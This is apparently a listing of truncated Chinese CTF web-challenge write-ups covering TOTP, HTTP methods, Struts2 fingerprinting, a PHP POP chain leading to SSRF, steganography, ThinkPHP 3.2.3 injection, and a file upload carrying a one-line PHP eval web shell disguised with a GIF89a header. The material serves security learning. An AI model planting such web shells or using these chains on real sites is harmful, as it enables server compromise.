# [De1CTF 2019]Giftbox main.js 里给了 TOTP 的参数 # TOTP TOTP 算法 (Time-based One-time Password algorithm) 是一种从共享密钥和当前时间计算一次性密码的算法。它已被采纳为 Internet 工程任务组标准 RFC 6238,是 Initiative for Open Authentication (OATH) 的基石,并被用于许多双因素身份验证系统。 TOTP 是基于散列的消息认证码(HMAC)的示例。它使用加密哈希函数将密钥与当前时间戳组合在一起以生成一次性密码。...

# [b01lers2020]Space Noodles 五条提示; HTTP 请求方式 HTTP 请求方式 序号 方法 描述 1 GET 请求指定的页面信息,并返回实体主体。 2 HEAD 类似于 GET 请求,只不过返回的响应中没有具体的内容,用于获取报头 3 POST 向指定资源提交数据进行处理请求(例如提交表单或者上传文件)。数据被包含在请求体中。POST 请求可能会导致新的资源的建立和 / 或已有资源的修改。 4 PUT 从客户端向服务器传送的数据取代指定的文档的内容。 5 DELETE 请求服务器删除指定的页面。 6 CONNECT HTTP/1.1...

# ctfshow_web_java # 判断网站是否基于 Struts2 的方法链接 通过页面回显的错误消息来判断,页面不回显错误消息时则无效 通过网页后缀来判断,如.do .action,有可能不准 如果配置文件中常数extension的值以逗号结尾或者有空值,指明了action可以不带后缀,那么不带后缀的uri也可能是struts2框架搭建的 如果使用Struts2的rest插件,其默认的struts-plugin.xml指定的请求后缀为xhtml,xml和json 判断 /struts/webconsole.html 是否存在来进行判断,需要 devMode 为...

# [MRCTF2020]Ezpop_Revenge 反序列化 pop 链: HelloWorld_DB::wakeup–>Typecho_Db::__construct(tostring)–>Typecho_Db_Query::__construct–>(this->_adapter=new Soapclient)–>SSRF payload: <?phpclass Typecho_Db_Query{ private $_sqlPreBuild; private $_adapter;...

# 刷新过的图片 豪堪,stegsolve 和随波逐流一把梭不出来(新手是这样的),直接 wp 学习大法 这个题目有两个考点: 1.F5 隐写 2.zip 伪加密

文件上传(先上传 htaccess 文件(虽然访问不了,但是可以用哇)): 上传 jpg 文件: GIF89a <script language="php"> eval($_POST['cmd']); </script> 蚁剑链接 参考链接:https://blog.csdn.net/Myon5/article/details/133819758

# [LineCTF2022]BB <?php error_reporting(0); function bye($s, $ptn){ if(preg_match($ptn, $s)){ return false; } return true; } foreach($_GET["env"] as $k=>$v){ if(bye($k, "/=/i") && bye($v,...

# [红明谷 CTF 2021] EasyTP 随便输入网址得到是 tp3.2.3 的模板题 直接搜索其漏洞 https://f5.pm/go-53579.html(这个是从最开始分析的,还是很清晰的) # 解法一:报错注入 <?phpnamespace Think\Db\Driver{ use PDO; class Mysql{ protected $options = array( PDO::MYSQL_ATTR_LOCAL_INFILE => true // 开启才能读取文件 ); protected $config =...

# [HMGCTF2022]Smarty Calculator 进入页面,随便输入一个字符,发现还未登录,没有提示就是文件泄露 www.zip,发现文件,泄露查看源码: if(isset($_POST['data'])){ if(isset($_COOKIE['login'])) { $data = waf($_POST['data']); echo "<div...